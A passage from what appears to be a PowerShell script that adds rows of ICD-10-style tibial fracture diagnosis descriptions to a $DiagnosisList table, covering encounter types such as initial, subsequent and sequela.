tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of left tibia","Nondisplaced bicondylar fracture of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bicondylar fracture of unspecified tibia","Nondisplaced bicondylar fracture of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial tuberosity","Displaced fracture of right tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial tuberosity","Displaced fracture of left tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial tuberosity","Displaced fracture of unspecified tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial tuberosity","Nondisplaced fracture of right tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial tuberosity","Nondisplaced fracture of left tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial tuberosity","Nondisplaced fracture of unspecified tibial tuberosity, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of right tibia","Torus fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of left tibia","Torus fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Torus fracture of upper end of unspecified tibia","Torus fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right tibia","Other fracture of upper end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left tibia","Other fracture of upper end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified tibia","Other fracture of upper end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right tibia","Unspecified fracture of shaft of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null 